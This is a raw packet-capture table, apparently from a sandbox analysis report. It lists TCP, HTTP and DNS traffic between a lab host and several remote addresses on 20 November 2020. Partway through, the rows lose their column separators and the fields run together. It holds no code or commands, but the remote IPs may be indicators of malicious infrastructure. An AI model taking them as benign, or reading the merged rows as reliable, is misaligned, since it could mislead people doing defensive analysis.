Nov 20, 2020 09:04:53.841814995 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841834068 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841850042 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841865063 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841881990 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841897964 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841914892 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841932058 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841933012 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.841953993 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.841973066 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.841978073 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.841981888 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.842011929 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.975908995 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.975929022 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.975982904 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.975987911 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976001024 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976021051 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976035118 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976042032 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976061106 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976063967 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976078987 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976089954 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976095915 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976114035 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976126909 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976130009 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976147890 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976161957 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976165056 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976186991 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976186991 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976206064 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976216078 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976226091 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976243019 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976243973 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976259947 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976268053 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976278067 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976294994 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:53.976308107 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:53.976334095 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110428095 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110456944 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110474110 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110491037 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110508919 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110508919 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110522032 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110533953 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110547066 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110553026 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110560894 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110584021 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110603094 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110603094 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110620975 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110632896 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110637903 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110656023 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110660076 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110671997 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110688925 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110693932 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110706091 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110727072 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110739946 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110748053 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110757113 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110768080 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110780001 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110788107 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110794067 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110809088 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110821009 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110832930 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110846043 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110857964 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110862970 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110876083 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110888004 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110910892 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110912085 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110937119 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110974073 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.110974073 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.110994101 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111011028 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111021042 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.111027956 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111051083 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111052990 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.111069918 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111085892 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111087084 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.111103058 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111119986 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111124039 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.111136913 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.111160994 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.111182928 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245289087 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245326996 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245348930 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245383024 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245394945 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245403051 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245421886 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245428085 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245431900 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245445967 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245467901 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245471001 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245492935 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245516062 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245517969 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245537996 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245539904 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245563030 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245588064 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245589972 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245609045 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245630980 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245635986 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245651007 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245668888 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245676041 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245682001 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245698929 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245702028 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245718956 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245738029 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245740891 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245759964 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245765924 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245784998 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245800018 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245806932 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245830059 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245846987 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245851994 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245872974 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245873928 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245901108 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245913029 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245925903 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245949984 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245965958 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.245975971 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.245987892 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246001959 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246006012 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246027946 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246028900 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246054888 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246056080 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246082067 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246082067 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246104956 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246112108 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246128082 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246136904 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246162891 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246162891 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246187925 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246205091 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246211052 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246229887 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246234894 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246254921 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246264935 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246277094 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246288061 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246304989 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246320009 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246329069 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246350050 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246357918 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246371031 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246393919 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246398926 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246416092 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246423960 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246438026 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246457100 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246462107 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246485949 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246490002 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246507883 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246527910 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246529102 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246551991 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246567011 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246572018 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246593952 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
Nov 20, 2020 09:04:54.246603012 CET | 49718 | 443 | 192.168.2.5 | 192.185.152.65
Nov 20, 2020 09:04:54.246615887 CET | 443 | 49718 | 192.185.152.65 | 192.168.2.5
                                                      Nov 20, 2020 09:04:54.246635914 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246635914 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246661901 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246663094 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246687889 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246697903 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246711016 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246718884 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246732950 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246745110 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246757984 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246766090 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246778965 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246788025 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246799946 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246810913 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246823072 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246845007 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246849060 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246865988 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246877909 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246889114 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:54.246901989 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246928930 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:54.246989012 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:04:59.111391068 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:59.111422062 CET44349718192.185.152.65192.168.2.5
                                                      Nov 20, 2020 09:04:59.111500025 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:05:17.669693947 CET49718443192.168.2.5192.185.152.65
                                                      Nov 20, 2020 09:05:53.281797886 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.298346043 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.298507929 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.298646927 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.314970016 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.419409990 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.419733047 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.420752048 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:05:53.420877934 CET4974380192.168.2.534.102.136.180
                                                      Nov 20, 2020 09:05:53.438633919 CET804974334.102.136.180192.168.2.5
                                                      Nov 20, 2020 09:06:15.770123005 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.873212099 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.873437881 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.873560905 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.976099014 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.976310968 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.976324081 CET804974554.147.194.143192.168.2.5
                                                      Nov 20, 2020 09:06:15.976547003 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:15.976655006 CET4974580192.168.2.554.147.194.143
                                                      Nov 20, 2020 09:06:16.079262972 CET804974554.147.194.143192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2020 09:04:29.703107119 CET | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:29.730174065 CET | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:30.566425085 CET | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:30.601692915 CET | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:31.407577991 CET | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:31.434827089 CET | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:34.731328964 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:34.758527994 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:42.050661087 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:42.077615976 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:52.822020054 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:52.981875896 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:53.127981901 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:53.166579008 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:53.743817091 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:53.772696018 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:55.063994884 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:55.099390984 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:04:58.159496069 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:04:58.186534882 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:07.165672064 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:07.201189995 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:19.018973112 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:19.054299116 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:19.603241920 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:19.640173912 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:20.127237082 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:20.162691116 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:20.655438900 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:20.692374945 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:21.174978018 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:21.212754965 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:21.804411888 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:21.840164900 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:22.555119991 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:22.590714931 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:23.129868984 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:23.166244984 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:24.209369898 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:24.244648933 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:25.874269962 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:25.909646034 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:27.315752029 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:27.343394995 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:27.647795916 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:27.690709114 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:30.082146883 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:30.126589060 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Nov 20, 2020 09:05:30.557787895 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Nov 20, 2020 09:05:30.594754934 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
